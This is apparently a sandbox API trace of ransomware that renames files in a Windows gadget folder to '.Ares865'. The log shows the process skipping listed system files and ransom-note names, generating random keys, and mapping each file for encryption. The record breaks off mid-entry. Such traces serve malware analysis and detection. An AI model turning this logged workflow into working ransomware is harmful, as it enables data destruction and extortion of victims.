[0115.653] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0a582e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0a582e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="15.png", cAlternateFileName="")) returned 1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="aoldtz.exe") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2=".") returned 1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="..") returned 1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="windows") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="bootmgr") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="temp") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="pagefile.sys") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="boot") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="ids.txt") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="ntuser.dat") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="perflogs") returned -1 [0115.653] lstrcmpiW (lpString1="15.png", lpString2="MSBuild") returned -1 [0115.653] lstrlenW (lpString="15.png") returned 6 [0115.653] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI") returned 75 [0115.653] lstrcpyW (in: lpString1=0x2cce48a, lpString2="15.png" | out: lpString1="15.png") returned="15.png" [0115.653] lstrlenW (lpString="15.png") returned 6 [0115.653] lstrlenW (lpString="Ares865") returned 7 [0115.653] lstrlenW (lpString=".dll") returned 4 [0115.653] lstrcmpiW (lpString1="15.png", lpString2=".dll") returned 1 [0115.653] lstrlenW (lpString=".lnk") returned 4 [0115.653] lstrcmpiW (lpString1="15.png", lpString2=".lnk") returned 1 [0115.653] lstrlenW (lpString=".ini") returned 4 [0115.653] lstrcmpiW (lpString1="15.png", lpString2=".ini") returned 1 [0115.654] lstrlenW (lpString=".sys") returned 4 [0115.654] lstrcmpiW (lpString1="15.png", lpString2=".sys") returned 1 [0115.654] lstrlenW (lpString="15.png") returned 6 [0115.654] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png.Ares865") returned 83 [0115.654] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png.ares865"), dwFlags=0x1) returned 1 [0115.655] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.656] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4066) returned 1 [0115.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.656] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.657] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.657] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.657] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x170 [0115.659] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0x190000 [0115.660] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.660] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.660] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.661] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.661] CloseHandle (hObject=0x170) returned 1 [0115.661] CloseHandle (hObject=0x118) returned 1 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.662] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0a582e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0a582e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16.png", cAlternateFileName="")) returned 1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="aoldtz.exe") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2=".") returned 1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="..") returned 1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="windows") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="bootmgr") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="temp") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="pagefile.sys") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="boot") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="ids.txt") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="ntuser.dat") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="perflogs") returned -1 [0115.662] lstrcmpiW (lpString1="16.png", lpString2="MSBuild") returned -1 [0115.662] lstrlenW (lpString="16.png") returned 6 [0115.662] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png") returned 75 [0115.662] lstrcpyW (in: lpString1=0x2cce48a, lpString2="16.png" | out: lpString1="16.png") returned="16.png" [0115.662] lstrlenW (lpString="16.png") returned 6 [0115.662] lstrlenW (lpString="Ares865") returned 7 [0115.662] lstrlenW (lpString=".dll") returned 4 [0115.662] lstrcmpiW (lpString1="16.png", lpString2=".dll") returned 1 [0115.662] lstrlenW (lpString=".lnk") returned 4 [0115.662] lstrcmpiW (lpString1="16.png", lpString2=".lnk") returned 1 [0115.662] lstrlenW (lpString=".ini") returned 4 [0115.662] lstrcmpiW (lpString1="16.png", lpString2=".ini") returned 1 [0115.662] lstrlenW (lpString=".sys") returned 4 [0115.662] lstrcmpiW (lpString1="16.png", lpString2=".sys") returned 1 [0115.662] lstrlenW (lpString="16.png") returned 6 [0115.663] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png.Ares865") returned 83 [0115.663] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png.ares865"), dwFlags=0x1) returned 1 [0115.664] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.664] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4066) returned 1 [0115.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.665] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.665] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.665] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.666] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x170 [0115.667] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0x190000 [0115.668] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.669] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.669] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.669] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.669] CloseHandle (hObject=0x170) returned 1 [0115.669] CloseHandle (hObject=0x118) returned 1 [0115.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.670] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0cb98d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0cb98d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="17.png", cAlternateFileName="")) returned 1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="aoldtz.exe") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2=".") returned 1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="..") returned 1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="windows") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="bootmgr") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="temp") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="pagefile.sys") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="boot") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="ids.txt") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="ntuser.dat") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="perflogs") returned -1 [0115.670] lstrcmpiW (lpString1="17.png", lpString2="MSBuild") returned -1 [0115.670] lstrlenW (lpString="17.png") returned 6 [0115.670] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png") returned 75 [0115.670] lstrcpyW (in: lpString1=0x2cce48a, lpString2="17.png" | out: lpString1="17.png") returned="17.png" [0115.670] lstrlenW (lpString="17.png") returned 6 [0115.670] lstrlenW (lpString="Ares865") returned 7 [0115.670] lstrlenW (lpString=".dll") returned 4 [0115.670] lstrcmpiW (lpString1="17.png", lpString2=".dll") returned 1 [0115.670] lstrlenW (lpString=".lnk") returned 4 [0115.670] lstrcmpiW (lpString1="17.png", lpString2=".lnk") returned 1 [0115.671] lstrlenW (lpString=".ini") returned 4 [0115.671] lstrcmpiW (lpString1="17.png", lpString2=".ini") returned 1 [0115.671] lstrlenW (lpString=".sys") returned 4 [0115.671] lstrcmpiW (lpString1="17.png", lpString2=".sys") returned 1 [0115.671] lstrlenW (lpString="17.png") returned 6 [0115.671] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png.Ares865") returned 83 [0115.671] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png.ares865"), dwFlags=0x1) returned 1 [0115.673] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.673] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7182) returned 1 [0115.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.673] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.674] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.674] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.674] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f10, lpName=0x0) returned 0x170 [0115.676] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f10) returned 0x190000 [0115.677] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.677] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.677] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.678] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.678] CloseHandle (hObject=0x170) returned 1 [0115.678] CloseHandle (hObject=0x118) returned 1 [0115.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.679] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0cb98d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0cb98d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="18.png", cAlternateFileName="")) returned 1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="aoldtz.exe") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2=".") returned 1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="..") returned 1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="windows") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="bootmgr") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="temp") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="pagefile.sys") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="boot") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="ids.txt") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="ntuser.dat") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="perflogs") returned -1 [0115.679] lstrcmpiW (lpString1="18.png", lpString2="MSBuild") returned -1 [0115.679] lstrlenW (lpString="18.png") returned 6 [0115.679] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png") returned 75 [0115.679] lstrcpyW (in: lpString1=0x2cce48a, lpString2="18.png" | out: lpString1="18.png") returned="18.png" [0115.679] lstrlenW (lpString="18.png") returned 6 [0115.679] lstrlenW (lpString="Ares865") returned 7 [0115.679] lstrlenW (lpString=".dll") returned 4 [0115.679] lstrcmpiW (lpString1="18.png", lpString2=".dll") returned 1 [0115.679] lstrlenW (lpString=".lnk") returned 4 [0115.679] lstrcmpiW (lpString1="18.png", lpString2=".lnk") returned 1 [0115.679] lstrlenW (lpString=".ini") returned 4 [0115.679] lstrcmpiW (lpString1="18.png", lpString2=".ini") returned 1 [0115.679] lstrlenW (lpString=".sys") returned 4 [0115.679] lstrcmpiW (lpString1="18.png", lpString2=".sys") returned 1 [0115.679] lstrlenW (lpString="18.png") returned 6 [0115.680] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png.Ares865") returned 83 [0115.680] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png.ares865"), dwFlags=0x1) returned 1 [0115.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.682] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7182) returned 1 [0115.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.682] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.683] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.683] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.683] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f10, lpName=0x0) returned 0x170 [0115.685] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f10) returned 0x190000 [0115.686] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.687] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.687] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.687] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.687] CloseHandle (hObject=0x170) returned 1 [0115.688] CloseHandle (hObject=0x118) returned 1 [0115.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.688] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0f1aec, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0f1aec, ftLastAccessTime.dwHighDateTime=0x1ca0404, 